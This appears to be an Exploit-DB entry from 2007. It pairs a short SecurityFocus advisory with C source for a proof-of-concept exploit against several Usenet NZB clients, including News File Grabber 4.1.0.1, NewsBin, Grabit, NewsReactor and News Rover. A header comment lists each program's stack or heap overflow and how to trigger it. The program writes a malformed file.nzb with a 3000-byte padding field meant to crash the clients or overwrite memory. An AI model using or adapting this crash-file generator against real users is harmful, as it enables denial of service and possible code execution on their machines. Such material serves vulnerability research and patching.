News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (2)

EDB-ID:

29618


Author:

Marsu

Type:

dos


Platform:

Windows

Date:

2007-02-19


// source: https://www.securityfocus.com/bid/22617/info
 
News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
 
Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application.
 
This issue affects version 4.1.0.1; other versions may also be affected. 

/*********************************************************************************************\
*                                                                            
                  *
*			                   NZB Generic 0Day DoS Exploit                          
          *
*    Proofs of Concept for News File Grabber, NewsBin, Grabit, NewsReactor 
and News Rover     *
*                                                                            
                  *
*                                                                            
                  *
* Bugs in News Rover <=12.1 Rev 1:                                           
                  *
* There's a stack overflow in RoverNZB triggered by files that contains a 
long subject.       *
* There's a stack overflow in NewsRover triggered by files that contains a 
long group.        *
* To trigger: run file.nzb                                                   
                  *
* Impact: Code execution on Windows XP, SP1 and SP2                          
                  *
*                                                                            
                  *
* Bug in News File Grabber 4.1.0.1:                                          
                  *
* If the subject field contains a new line, the app will try to exec data in 
memory. But      *
* since the address changed every time the app runs it's very hard to 
exploit. However I      *
* sometimes got EIP overwritten by my chars                                  
                  *
* To trigger: load file.nzb and start download. CPU -> 100% and then Out of 
Memory error.     *
* Impact: Code execution on Windows XP, SP1 and SP2                          
                  *
*                                                                            
                  *
* Bug in Grabit 1.5.3:                                                       
                  *
* Grabit does not correctly handle fields that contains a semicolon.         
                  *
* To trigger: Just grab the file                                             
                  *
* Impact: DoS                                                                
                  *
* Note: Grabit 1.6 is not affected.                                          
                  *
*                                                                            
                  *
* Bug in NewsReactor:                                                        
                  *
* There's a heap overflow that occurs when group field is too long.          
                  *
* To trigger: load file.nzb, click grab. After a few tries to get the file 
it crashes.        *
* Impact: Code execution on Windows XP, SP1 and DoS on SP2                   
                  *
*                                                                            
                  *
* Bug in NewsBin Pro 4.3.2:                                                  
                  *
* There's a heap overflow that occurs when group field is too long.          
                  *
* To trigger: load file.nzb, and start download. The app should then be 
unstable.             *
* Impact: Code execution on Windows XP, SP1 and DoS on SP2                   
                  *
*                                                                            
                  *
* Bug in NewsBin Pro 5.33 (maybe others...):                                 
                  *
* There's a heap overflow that occurs when group field is too long.          
                  *
* To trigger: load file.nzb, and start download. Then click "Delete All 
Posts". Boom!         *
* Impact: Code execution on Windows XP, SP1 and DoS on SP2                   
                  *
* Note: Maybe it's possible to exec code on SP2, but there is a lot of bad 
chars and with the *
* stack protection I didn't find a way to jump to a good return address.     
                  *
*                                                                            
                  *
* Solution: Buy your dvds leecha!!!                                          
                  *
*                                                                            
                  *
*                                                                            
                  *
* Coded and discovered by Marsu <MarsupilamiPowa@hotmail.fr>                 
                  *
* Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P         
                  *
\*********************************************************************************************/

#include "stdlib.h"
#include "stdio.h"
#include "string.h"

char nzbheader[]="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n"
				 "<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" 
\"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n"
				 "<!-- NZB Generated by MarsupilamiPowa -->\n"
				 "<nzb xmlns=\"MarsupilamiPowa@hotmail.fr\">\n\n";


char nzbend[]="</segment>\n"
              "</segments>\n"
              "</file>\n"
              "</nzb>\n";



int main(int argc, char* argv[]) {

FILE *file;
char * pad;

printf("MarsupilamiPowa's Generic NZB DoS Exploit\n");

file=fopen("file.nzb","wb");

fprintf(file,nzbheader);
fprintf(file,"<file poster=\"Marsu\n");
fprintf(file,"\" date=\"1170609233\"\nsubject=\"hello bug");
fprintf(file,"\">\n");
fprintf(file,"<groups><group>");

pad = (char*)malloc(sizeof(char)*3000);
memset(pad,'A',3000);
fprintf(file,pad);
fprintf(file,"</group></groups>\n<segments>\n<segment bytes=\"30\" 
number=\"1\">");
fprintf(file,"\n;\n");
fprintf(file,nzbend);
fclose(file);

printf("file.nzb generated! Have fun\n");
return 0;

}